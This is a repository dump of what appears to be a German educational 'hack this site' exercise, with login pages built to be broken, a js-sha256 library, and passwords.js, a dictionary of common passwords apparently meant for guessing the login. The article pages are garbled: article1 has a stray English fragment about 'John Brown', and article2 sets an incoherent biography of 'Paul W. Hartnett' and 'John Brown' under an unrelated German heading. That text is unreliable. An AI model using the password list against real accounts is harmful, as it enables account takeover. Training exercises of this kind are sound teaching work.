├── article1.html ├── article2.html ├── img └── software-developer.jpg ├── index.html ├── libs └── sha256.js ├── login-success.html ├── login.html ├── login.php ├── login2.html ├── passwords.js ├── readme.MD ├── script.js ├── secret-article.html ├── style.css └── templates ├── footer.html └── header.html /article1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 |
19 | 20 | 21 |
IT Security
22 |

Hacke diese Seite

23 | 24 |

Auf dieser Seite wimmelt es nur so von Sicherheitslücken. Deine Aufgabe ist es diese Lücken zu finden und zu nutzen. So lernst du spielerisch einfache Hackerattacken kennen. Du wirst sehen, dass die Kunst des Hackens deutlich leichter ist als 25 | du erwartest.

26 |

Die Aufgabe besteht insgesamt aus 5 Teilen. Die Aufgaben werden mit der Zeit immer schwerer. Wenn du ese schaffst alle Aufgaben zu 100% selbstständig zu lösen hast du bereits ein tiefgehendes Verständnis über die Webentwicklung. Herzlichen Glückwunsch! 27 |

28 |

In den meisten Fällen wirst du die Aufgaben jedoch nicht selbstständig lösen können. Das ist ganz normal. Aus diesem Grund wirst du selbstverständlich auch eine Lösung zu dieser Aufgabe bekommen. Diese hilft dir dabei noch einmal alles bis ins 29 | kleinste Detail nachzuvollziehen. 30 |

31 |

Du findest die Lösung auf YouTube. Junus erklärt dir in einem Video genau wie er vorgeht. Letztendlich analysiert man die Seiten immer auf dieselbe Art und Weise. Junus zeigt dir genau wie er vorgeht und wie er alle 5 Sicherheitslücken findet. 32 |             Das gesamte Projekt hat natürlich pädagogische Zwecke. Es geht darum diese Fehler zu verstehen. Dadurch wirst du sie in deiner täglichen Arbeit als Programmierer vermeiden können.

33 | 34 |

I do not know the full extent of this material for a specific reason, but John Brown's 35 |

36 |

Viel Spaß bei den Aufgaben!

37 |
38 |
39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /article2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 |
19 | 20 | 21 |
HTML, JavaScript und Angular
22 |

Die beste Kombination für Einsteiger

23 | 24 |

This is an essay by Paul W. Hartnett, an Englishman and former student at Brigham Young University. W. Hartnett, who was working as an Assistant to the President during the second world war, studied literature and business matters at Brigham Young 25 | University. He had also a Doctorate degree in Political Science, History and Philosophy, and was also a member of the Historical Studies Department. You can read more about him here. 26 |

27 |

There is more about Paul Hartnett here. He also spoke with Peter Storlick about his work in politics and economics, and what goes into his academic success. On that topic he speaks about The Problem of Religion, and his recent book, The New Politics 28 | of Religion, discusses politics, economics, history, and the economic system and the United States at the University of Wyoming. 29 |

30 |

This is John Brown's piece here. John Brown was an assistant professor of political Science at Brigham Young University. He participated in various political campaigns and held discussions with politicians of all political stripes including the 31 | Republicans and Democrats, and in many ways he was a "reformer". He received a B.A. in Political Science and he wrote six books and an audio series on politics at Brigham Young University. 32 |

33 |

John Brown's writing on politics and economics is mostly related to the politics of the United States. 34 |

35 | 36 |

I do not know the full extent of this material for a specific reason, but John Brown's 37 |

38 |
39 |
40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /img/software-developer.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JunusErgin/hackme-part2/474b2535c4e93434361e84041fd9d388dd8857d4/img/software-developer.jpg -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Neues in der Hacker-Welt 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 |
17 | 18 |
Login Formular
19 |

Hacke dieses Passwort

20 |

21 | Auf dieser Seite findest du ein Passwort-Feld. Deine Aufgabe ist es, das Passwort zu erraten. 22 |

23 |
24 | (Mehr lesen) 25 |
26 |
27 | 28 |
29 |
Login Formular
30 |

Kannst du diesen Login knacken?

31 | 32 |

33 | In dieser Aufgabe wird es etwas schwerer. Du benötigst zusätzlich noch eine E-Mail Adresse. Viel Spaß! 34 |

35 |
36 | (Mehr lesen) 37 |
38 |
39 | 40 | 64 | 65 | 66 |
67 | 68 | 69 | -------------------------------------------------------------------------------- /libs/sha256.js: -------------------------------------------------------------------------------- 1 | /** 2 | * [js-sha256]{@link https://github.com/emn178/js-sha256} 3 | * 4 | * @version 0.9.0 5 | * @author Chen, Yi-Cyuan [emn178@gmail.com] 6 | * @copyright Chen, Yi-Cyuan 2014-2017 7 | * @license MIT 8 | */ 9 | /*jslint bitwise: true */ 10 | (function() { 11 | 'use strict'; 12 | 13 | var ERROR = 'input is invalid type'; 14 | var WINDOW = typeof window === 'object'; 15 | var root = WINDOW ? window : {}; 16 | if (root.JS_SHA256_NO_WINDOW) { 17 | WINDOW = false; 18 | } 19 | var WEB_WORKER = !WINDOW && typeof self === 'object'; 20 | var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node; 21 | if (NODE_JS) { 22 | root = global; 23 | } else if (WEB_WORKER) { 24 | root = self; 25 | } 26 | var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports; 27 | var AMD = typeof define === 'function' && define.amd; 28 | var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined'; 29 | var HEX_CHARS = '0123456789abcdef'.split(''); 30 | var EXTRA = [-2147483648, 8388608, 32768, 128]; 31 | var SHIFT = [24, 16, 8, 0]; 32 | var K = [ 33 | 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 34 | 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 35 | 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 36 | 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 37 | 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 38 | 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 39 | 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 40 | 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 41 | ]; 42 | var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer']; 43 | 44 | var blocks = []; 45 | 46 | if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) { 47 | Array.isArray = function(obj) { 48 | return Object.prototype.toString.call(obj) === '[object Array]'; 49 | }; 50 | } 51 | 52 | if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) { 53 | ArrayBuffer.isView = function(obj) { 54 | return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer; 55 | }; 56 | } 57 | 58 | var createOutputMethod = function(outputType, is224) { 59 | return function(message) { 60 | return new Sha256(is224, true).update(message)[outputType](); 61 | }; 62 | }; 63 | 64 | var createMethod = function(is224) { 65 | var method = createOutputMethod('hex', is224); 66 | if (NODE_JS) { 67 | method = nodeWrap(method, is224); 68 | } 69 | method.create = function() { 70 | return new Sha256(is224); 71 | }; 72 | method.update = function(message) { 73 | return method.create().update(message); 74 | }; 75 | for (var i = 0; i < OUTPUT_TYPES.length; ++i) { 76 | var type = OUTPUT_TYPES[i]; 77 | method[type] = createOutputMethod(type, is224); 78 | } 79 | return method; 80 | }; 81 | 82 | var nodeWrap = function(method, is224) { 83 | var crypto = eval("require('crypto')"); 84 | var Buffer = eval("require('buffer').Buffer"); 85 | var algorithm = is224 ? 'sha224' : 'sha256'; 86 | var nodeMethod = function(message) { 87 | if (typeof message === 'string') { 88 | return crypto.createHash(algorithm).update(message, 'utf8').digest('hex'); 89 | } else { 90 | if (message === null || message === undefined) { 91 | throw new Error(ERROR); 92 | } else if (message.constructor === ArrayBuffer) { 93 | message = new Uint8Array(message); 94 | } 95 | } 96 | if (Array.isArray(message) || ArrayBuffer.isView(message) || 97 | message.constructor === Buffer) { 98 | return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex'); 99 | } else { 100 | return method(message); 101 | } 102 | }; 103 | return nodeMethod; 104 | }; 105 | 106 | var createHmacOutputMethod = function(outputType, is224) { 107 | return function(key, message) { 108 | return new HmacSha256(key, is224, true).update(message)[outputType](); 109 | }; 110 | }; 111 | 112 | var createHmacMethod = function(is224) { 113 | var method = createHmacOutputMethod('hex', is224); 114 | method.create = function(key) { 115 | return new HmacSha256(key, is224); 116 | }; 117 | method.update = function(key, message) { 118 | return method.create(key).update(message); 119 | }; 120 | for (var i = 0; i < OUTPUT_TYPES.length; ++i) { 121 | var type = OUTPUT_TYPES[i]; 122 | method[type] = createHmacOutputMethod(type, is224); 123 | } 124 | return method; 125 | }; 126 | 127 | function Sha256(is224, sharedMemory) { 128 | if (sharedMemory) { 129 | blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] = 130 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 131 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 132 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 133 | this.blocks = blocks; 134 | } else { 135 | this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; 136 | } 137 | 138 | if (is224) { 139 | this.h0 = 0xc1059ed8; 140 | this.h1 = 0x367cd507; 141 | this.h2 = 0x3070dd17; 142 | this.h3 = 0xf70e5939; 143 | this.h4 = 0xffc00b31; 144 | this.h5 = 0x68581511; 145 | this.h6 = 0x64f98fa7; 146 | this.h7 = 0xbefa4fa4; 147 | } else { // 256 148 | this.h0 = 0x6a09e667; 149 | this.h1 = 0xbb67ae85; 150 | this.h2 = 0x3c6ef372; 151 | this.h3 = 0xa54ff53a; 152 | this.h4 = 0x510e527f; 153 | this.h5 = 0x9b05688c; 154 | this.h6 = 0x1f83d9ab; 155 | this.h7 = 0x5be0cd19; 156 | } 157 | 158 | this.block = this.start = this.bytes = this.hBytes = 0; 159 | this.finalized = this.hashed = false; 160 | this.first = true; 161 | this.is224 = is224; 162 | } 163 | 164 | Sha256.prototype.update = function(message) { 165 | if (this.finalized) { 166 | return; 167 | } 168 | var notString, type = typeof message; 169 | if (type !== 'string') { 170 | if (type === 'object') { 171 | if (message === null) { 172 | throw new Error(ERROR); 173 | } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) { 174 | message = new Uint8Array(message); 175 | } else if (!Array.isArray(message)) { 176 | if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) { 177 | throw new Error(ERROR); 178 | } 179 | } 180 | } else { 181 | throw new Error(ERROR); 182 | } 183 | notString = true; 184 | } 185 | var code, index = 0, 186 | i, length = message.length, 187 | blocks = this.blocks; 188 | 189 | while (index < length) { 190 | if (this.hashed) { 191 | this.hashed = false; 192 | blocks[0] = this.block; 193 | blocks[16] = blocks[1] = blocks[2] = blocks[3] = 194 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 195 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 196 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 197 | } 198 | 199 | if (notString) { 200 | for (i = this.start; index < length && i < 64; ++index) { 201 | blocks[i >> 2] |= message[index] << SHIFT[i++ & 3]; 202 | } 203 | } else { 204 | for (i = this.start; index < length && i < 64; ++index) { 205 | code = message.charCodeAt(index); 206 | if (code < 0x80) { 207 | blocks[i >> 2] |= code << SHIFT[i++ & 3]; 208 | } else if (code < 0x800) { 209 | blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3]; 210 | blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 211 | } else if (code < 0xd800 || code >= 0xe000) { 212 | blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3]; 213 | blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; 214 | blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 215 | } else { 216 | code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff)); 217 | blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3]; 218 | blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3]; 219 | blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; 220 | blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 221 | } 222 | } 223 | } 224 | 225 | this.lastByteIndex = i; 226 | this.bytes += i - this.start; 227 | if (i >= 64) { 228 | this.block = blocks[16]; 229 | this.start = i - 64; 230 | this.hash(); 231 | this.hashed = true; 232 | } else { 233 | this.start = i; 234 | } 235 | } 236 | if (this.bytes > 4294967295) { 237 | this.hBytes += this.bytes / 4294967296 << 0; 238 | this.bytes = this.bytes % 4294967296; 239 | } 240 | return this; 241 | }; 242 | 243 | Sha256.prototype.finalize = function() { 244 | if (this.finalized) { 245 | return; 246 | } 247 | this.finalized = true; 248 | var blocks = this.blocks, 249 | i = this.lastByteIndex; 250 | blocks[16] = this.block; 251 | blocks[i >> 2] |= EXTRA[i & 3]; 252 | this.block = blocks[16]; 253 | if (i >= 56) { 254 | if (!this.hashed) { 255 | this.hash(); 256 | } 257 | blocks[0] = this.block; 258 | blocks[16] = blocks[1] = blocks[2] = blocks[3] = 259 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 260 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 261 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 262 | } 263 | blocks[14] = this.hBytes << 3 | this.bytes >>> 29; 264 | blocks[15] = this.bytes << 3; 265 | this.hash(); 266 | }; 267 | 268 | Sha256.prototype.hash = function() { 269 | var a = this.h0, 270 | b = this.h1, 271 | c = this.h2, 272 | d = this.h3, 273 | e = this.h4, 274 | f = this.h5, 275 | g = this.h6, 276 | h = this.h7, 277 | blocks = this.blocks, 278 | j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc; 279 | 280 | for (j = 16; j < 64; ++j) { 281 | // rightrotate 282 | t1 = blocks[j - 15]; 283 | s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 14)) ^ (t1 >>> 3); 284 | t1 = blocks[j - 2]; 285 | s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10); 286 | blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0; 287 | } 288 | 289 | bc = b & c; 290 | for (j = 0; j < 64; j += 4) { 291 | if (this.first) { 292 | if (this.is224) { 293 | ab = 300032; 294 | t1 = blocks[0] - 1413257819; 295 | h = t1 - 150054599 << 0; 296 | d = t1 + 24177077 << 0; 297 | } else { 298 | ab = 704751109; 299 | t1 = blocks[0] - 210244248; 300 | h = t1 - 1521486534 << 0; 301 | d = t1 + 143694565 << 0; 302 | } 303 | this.first = false; 304 | } else { 305 | s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10)); 306 | s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7)); 307 | ab = a & b; 308 | maj = ab ^ (a & c) ^ bc; 309 | ch = (e & f) ^ (~e & g); 310 | t1 = h + s1 + ch + K[j] + blocks[j]; 311 | t2 = s0 + maj; 312 | h = d + t1 << 0; 313 | d = t1 + t2 << 0; 314 | } 315 | s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10)); 316 | s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7)); 317 | da = d & a; 318 | maj = da ^ (d & b) ^ ab; 319 | ch = (h & e) ^ (~h & f); 320 | t1 = g + s1 + ch + K[j + 1] + blocks[j + 1]; 321 | t2 = s0 + maj; 322 | g = c + t1 << 0; 323 | c = t1 + t2 << 0; 324 | s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10)); 325 | s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7)); 326 | cd = c & d; 327 | maj = cd ^ (c & a) ^ da; 328 | ch = (g & h) ^ (~g & e); 329 | t1 = f + s1 + ch + K[j + 2] + blocks[j + 2]; 330 | t2 = s0 + maj; 331 | f = b + t1 << 0; 332 | b = t1 + t2 << 0; 333 | s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10)); 334 | s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7)); 335 | bc = b & c; 336 | maj = bc ^ (b & d) ^ cd; 337 | ch = (f & g) ^ (~f & h); 338 | t1 = e + s1 + ch + K[j + 3] + blocks[j + 3]; 339 | t2 = s0 + maj; 340 | e = a + t1 << 0; 341 | a = t1 + t2 << 0; 342 | } 343 | 344 | this.h0 = this.h0 + a << 0; 345 | this.h1 = this.h1 + b << 0; 346 | this.h2 = this.h2 + c << 0; 347 | this.h3 = this.h3 + d << 0; 348 | this.h4 = this.h4 + e << 0; 349 | this.h5 = this.h5 + f << 0; 350 | this.h6 = this.h6 + g << 0; 351 | this.h7 = this.h7 + h << 0; 352 | }; 353 | 354 | Sha256.prototype.hex = function() { 355 | this.finalize(); 356 | 357 | var h0 = this.h0, 358 | h1 = this.h1, 359 | h2 = this.h2, 360 | h3 = this.h3, 361 | h4 = this.h4, 362 | h5 = this.h5, 363 | h6 = this.h6, 364 | h7 = this.h7; 365 | 366 | var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] + 367 | HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] + 368 | HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] + 369 | HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] + 370 | HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] + 371 | HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] + 372 | HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] + 373 | HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] + 374 | HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] + 375 | HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] + 376 | HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] + 377 | HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] + 378 | HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] + 379 | HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] + 380 | HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] + 381 | HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] + 382 | HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] + 383 | HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] + 384 | HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] + 385 | HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] + 386 | HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] + 387 | HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] + 388 | HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] + 389 | HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] + 390 | HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] + 391 | HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] + 392 | HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] + 393 | HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F]; 394 | if (!this.is224) { 395 | hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] + 396 | HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] + 397 | HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] + 398 | HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F]; 399 | } 400 | return hex; 401 | }; 402 | 403 | Sha256.prototype.toString = Sha256.prototype.hex; 404 | 405 | Sha256.prototype.digest = function() { 406 | this.finalize(); 407 | 408 | var h0 = this.h0, 409 | h1 = this.h1, 410 | h2 = this.h2, 411 | h3 = this.h3, 412 | h4 = this.h4, 413 | h5 = this.h5, 414 | h6 = this.h6, 415 | h7 = this.h7; 416 | 417 | var arr = [ 418 | (h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF, 419 | (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF, 420 | (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF, 421 | (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF, 422 | (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF, 423 | (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF, 424 | (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 & 0xFF 425 | ]; 426 | if (!this.is224) { 427 | arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF); 428 | } 429 | return arr; 430 | }; 431 | 432 | Sha256.prototype.array = Sha256.prototype.digest; 433 | 434 | Sha256.prototype.arrayBuffer = function() { 435 | this.finalize(); 436 | 437 | var buffer = new ArrayBuffer(this.is224 ? 28 : 32); 438 | var dataView = new DataView(buffer); 439 | dataView.setUint32(0, this.h0); 440 | dataView.setUint32(4, this.h1); 441 | dataView.setUint32(8, this.h2); 442 | dataView.setUint32(12, this.h3); 443 | dataView.setUint32(16, this.h4); 444 | dataView.setUint32(20, this.h5); 445 | dataView.setUint32(24, this.h6); 446 | if (!this.is224) { 447 | dataView.setUint32(28, this.h7); 448 | } 449 | return buffer; 450 | }; 451 | 452 | function HmacSha256(key, is224, sharedMemory) { 453 | var i, type = typeof key; 454 | if (type === 'string') { 455 | var bytes = [], 456 | length = key.length, 457 | index = 0, 458 | code; 459 | for (i = 0; i < length; ++i) { 460 | code = key.charCodeAt(i); 461 | if (code < 0x80) { 462 | bytes[index++] = code; 463 | } else if (code < 0x800) { 464 | bytes[index++] = (0xc0 | (code >> 6)); 465 | bytes[index++] = (0x80 | (code & 0x3f)); 466 | } else if (code < 0xd800 || code >= 0xe000) { 467 | bytes[index++] = (0xe0 | (code >> 12)); 468 | bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); 469 | bytes[index++] = (0x80 | (code & 0x3f)); 470 | } else { 471 | code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff)); 472 | bytes[index++] = (0xf0 | (code >> 18)); 473 | bytes[index++] = (0x80 | ((code >> 12) & 0x3f)); 474 | bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); 475 | bytes[index++] = (0x80 | (code & 0x3f)); 476 | } 477 | } 478 | key = bytes; 479 | } else { 480 | if (type === 'object') { 481 | if (key === null) { 482 | throw new Error(ERROR); 483 | } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) { 484 | key = new Uint8Array(key); 485 | } else if (!Array.isArray(key)) { 486 | if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) { 487 | throw new Error(ERROR); 488 | } 489 | } 490 | } else { 491 | throw new Error(ERROR); 492 | } 493 | } 494 | 495 | if (key.length > 64) { 496 | key = (new Sha256(is224, true)).update(key).array(); 497 | } 498 | 499 | var oKeyPad = [], 500 | iKeyPad = []; 501 | for (i = 0; i < 64; ++i) { 502 | var b = key[i] || 0; 503 | oKeyPad[i] = 0x5c ^ b; 504 | iKeyPad[i] = 0x36 ^ b; 505 | } 506 | 507 | Sha256.call(this, is224, sharedMemory); 508 | 509 | this.update(iKeyPad); 510 | this.oKeyPad = oKeyPad; 511 | this.inner = true; 512 | this.sharedMemory = sharedMemory; 513 | } 514 | HmacSha256.prototype = new Sha256(); 515 | 516 | HmacSha256.prototype.finalize = function() { 517 | Sha256.prototype.finalize.call(this); 518 | if (this.inner) { 519 | this.inner = false; 520 | var innerHash = this.array(); 521 | Sha256.call(this, this.is224, this.sharedMemory); 522 | this.update(this.oKeyPad); 523 | this.update(innerHash); 524 | Sha256.prototype.finalize.call(this); 525 | } 526 | }; 527 | 528 | var exports = createMethod(); 529 | exports.sha256 = exports; 530 | exports.sha224 = createMethod(true); 531 | exports.sha256.hmac = createHmacMethod(); 532 | exports.sha224.hmac = createHmacMethod(true); 533 | 534 | if (COMMON_JS) { 535 | module.exports = exports; 536 | } else { 537 | root.sha256 = exports.sha256; 538 | root.sha224 = exports.sha224; 539 | if (AMD) { 540 | define(function() { 541 | return exports; 542 | }); 543 | } 544 | } 545 | })(); -------------------------------------------------------------------------------- /login-success.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 |
18 |
19 |

Herzlichen Glückwunsch!

20 | 21 |

Du hast dich erfolgreich eingeloggt! Du kannst jetzt mit der nächsten Übung fortfahren.

22 | 23 |

24 | Weiter 25 |

26 |
27 |
28 | 29 |
30 | 31 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 |
19 |
20 |
21 |
22 | Auf dieser Seite musst du dich einloggen. Es gibt nur ein Problem. Du kennst das Passwort nicht. Versuche das Problem zu lösen. 23 |
24 | 25 | 26 |
27 |
28 | 29 |
30 | 31 |
32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /login.php: -------------------------------------------------------------------------------- 1 | "; -------------------------------------------------------------------------------- /login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 |
20 |
21 |
22 | 23 | 24 | 25 |
26 |
27 | 28 |
29 | 30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /passwords.js: -------------------------------------------------------------------------------- 1 | let dictionary = [123456, 123456789, 12345, "qwerty", "password", 12345678, 111111, 123123, 1234567890, 1234567, "qwerty123", "000000", "1q2w3e", "aa12345678", "abc123", "password1", 1234, "qwertyuiop", 123321, "password123", "1q2w3e4r5t", "iloveyou", 654321, 666666, 987654321, 123, "123456a", "qwe123", "1q2w3e4r", 7777777, "1qaz2wsx", "123qwe", "zxcvbnm", 121212, "asdasd", "a123456", 555555, "dragon", 112233, 123123123, "monkey", 11111111, "qazwsx", 159753, "asdfghjkl", 222222, "1234qwer", "qwerty1", 123654, "123abc", "asdfgh", 777777, "aaaaaa", "myspace1", 88888888, "fuckyou", "123456789a", 999999, 888888, "football", "princess", 789456123, 147258369, 1111111, "sunshine", "michael", "computer", "qwer1234", "daniel", 789456, 11111, "abcd1234", "q1w2e3r4", "shadow", 159357, "123456q", 1111, "samsung", "killer", "asd123", "superman", "master", "12345a", "azerty", "zxcvbn", "qazwsxedc", 131313, "ashley", "target123", 987654, "baseball", "qwert", "asdasd123", "qwerty", "soccer", "charlie", "qweasdzxc", "tinkle", "jessica", "q1w2e3r4t5", "asdf", "test1", "1g2w3e4r", "gwerty123", "zag12wsx", "gwerty", 147258, 12341234, "qweqwe", "jordan", "pokemon", "q1w2e3r4t5y6", 12345678910, 1111111111, 12344321, "thomas", "love", "12qwaszx", 102030, "welcome", 